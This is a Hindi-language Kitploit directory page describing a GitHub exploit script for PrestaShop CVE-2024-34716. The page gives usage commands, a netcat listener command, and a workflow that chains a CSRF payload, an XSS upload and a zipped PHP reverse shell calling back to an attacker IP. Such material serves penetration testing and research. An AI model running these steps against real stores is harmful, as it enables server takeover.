Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Prestashop-CVE-2024-34716 — PrestaShop के लिए एक स्वचालित CSRF शोषण स्क्रिप्ट जो एक तैयार ZIP पेलोड के माध्यम से PHP रिवर्स शेल अपलोड और निष्पादित करती है, कनेक्शन कैप्चर के लिए Netcat लिसनर की आवश्यकता होती है। | Kitploit
उपकरण/GitHubGitHub/0xdtc/prestashop-cve-2024-34716
पेलोड जनरेशनशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHub0xdtc/prestashop-cve-2024-34716

Prestashop-CVE-2024-34716

PrestaShop के लिए एक स्वचालित CSRF शोषण स्क्रिप्ट जो एक तैयार ZIP पेलोड के माध्यम से PHP रिवर्स शेल अपलोड और निष्पादित करती है, कनेक्शन कैप्चर के लिए Netcat लिसनर की आवश्यकता होती है।

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CSRF और रिवर्स शेल हमले के लिए एक्सप्लॉइट स्क्रिप्ट

यह स्क्रिप्ट एक CSRF (क्रॉस-साइट रिक्वेस्ट फोर्जरी) एक्सप्लॉइट को स्वचालित करती है ताकि लक्ष्य के वेब सर्वर पर एक PHP रिवर्स शेल अपलोड किया जा सके और उसे निष्पादित किया जा सके। रिवर्स शेल को एक तैयार CSRF पेलोड के माध्यम से ZIP फ़ाइल के रूप में वितरित किया जाता है, जो तब ट्रिगर होता है जब कोई विशेषाधिकार प्राप्त उपयोगकर्ता किसी विशिष्ट एंडपॉइंट के साथ इंटरैक्ट करता है। स्क्रिप्ट को रिवर्स शेल कनेक्शन को कैप्चर करने के लिए एक सुनने वाले Netcat इंस्टेंस की आवश्यकता होती है।

फिलहाल टूटा हुआ लगता है, बाद में अपडेट करूंगा

आवश्यकताएँ

  • Netcat: सुनिश्चित करें कि Netcat स्थापित है और निर्दिष्ट पोर्ट (डिफ़ॉल्ट: 9001) पर सुन सकता है।
  • Python 3: HTTP पर फ़ाइलें सर्व करने के लिए उपयोग किया जाता है।
  • Curl और JQ: HTTP अनुरोधों को लाने और JSON पार्सिंग को संभालने के लिए उपयोग किया जाता है।

उपयोग

root@kitploit:~
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

तर्क

  • target_url: लक्ष्य का आधार URL (जैसे, https://example.com)।
  • admin_endpoint: एडमिन थीम इम्पोर्ट एंडपॉइंट का पथ।
  • admin_email: एक प्रशासक का ईमेल पता (पेलोड के लिए स्पूफ करने हेतु)।
  • attacker_ip: वह IP पता जहाँ रिवर्स शेल लिसनर कनेक्शन प्राप्त करेगा।

उदाहरण

root@kitploit:~
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10

एक्सप्लॉइट वर्कफ़्लो

  • रिवर्स शेल निर्माण: प्रदान किए गए attacker_ip और पोर्ट 9001 के साथ revshells.com का उपयोग करके एक PHP रिवर्स शेल उत्पन्न करता है।
  • ZIP पैकेजिंग: रिवर्स शेल स्क्रिप्ट (love.php) को Love-exploit.zip में संपीड़ित किया जाता है।
  • CSRF टोकन प्राप्ति: थीम इम्पोर्ट अनुरोध को अधिकृत करने के लिए लक्ष्य से CSRF टोकन प्राप्त करता है।
  • HTML पेलोड निर्माण: एक JavaScript स्क्रिप्ट युक्त HTML पेलोड (csrf_payload.html) बनाता है जो रिवर्स शेल को आयात करने के लिए लक्ष्य के एडमिन पैनल में स्वचालित रूप से एक दुर्भावनापूर्ण अनुरोध सबमिट करता है।
  • HTTP सर्वर सेटअप: पोर्ट 8000 पर एक अस्थायी HTTP सर्वर Love-exploit.zip को लक्ष्य द्वारा आयात करने के लिए प्रस्तुत करता है।
  • XSS अपलोड और CSRF ट्रिगर: CSRF पेलोड को लक्ष्य के संपर्क पृष्ठ पर अपलोड किया जाता है। जब एक्सेस किया जाता है, तो यह CSRF हमले को ट्रिगर करता है।
  • रिवर्स शेल लिसनर: हमलावर Netcat का उपयोग करके पीड़ित से आने वाले कनेक्शनों की निगरानी करता है।

निष्पादन चरण

  1. अपनी मशीन पर Netcat लिसनर प्रारंभ करें:

    root@kitploit:~
    nc -nvlp 9001
    
  2. स्क्रिप्ट चलाएँ:

    root@kitploit:~
    ./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
    
  3. लक्ष्य द्वारा CSRF पेलोड निष्पादित करने और रिवर्स शेल कनेक्शन प्राप्त करने की प्रतीक्षा करें।

आउटपुट

स्क्रिप्ट निष्पादन के दौरान निम्नलिखित जानकारी आउटपुट करती है:

  • CSRF टोकन प्राप्ति स्थिति।
  • रिवर्स शेल निर्माण और पैकेजिंग की स्थिति।
  • पेलोड वितरण की स्थिति और HTTP सर्वर स्थिति।

महत्वपूर्ण नोट्स

  • अनुमतियाँ: इस स्क्रिप्ट को लक्ष्य सर्वर पर निष्पादित करने की अनुमति आवश्यक है। अनधिकृत उपयोग अवैध है और कानून द्वारा दंडनीय है।
  • परीक्षण वातावरण: केवल नियंत्रित, अधिकृत वातावरण में उपयोग करें, जैसे कि साइबर सुरक्षा प्रयोगशाला।
  • पोर्ट विवाद: स्क्रिप्ट चलाने से पहले सुनिश्चित करें कि पोर्ट 8000 (HTTP सर्वर) और 9001 (Netcat लिसनर) खाली हैं।

उदाहरण आउटपुट

root@kitploit:~
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...

यह दस्तावेज़ नियंत्रित वातावरण में पेनिट्रेशन टेस्टर्स और साइबर सुरक्षा शोधकर्ताओं द्वारा उपयोग के लिए है। इस उपकरण का अनधिकृत उद्देश्यों के लिए दुरुपयोग सख्त वर्जित है।


अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और कानूनी साइबर सुरक्षा मूल्यांकन के लिए है। बिना अनुमति के किसी सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध है और नैतिक दिशानिर्देशों के विरुद्ध है।

टूल डाउनलोड करें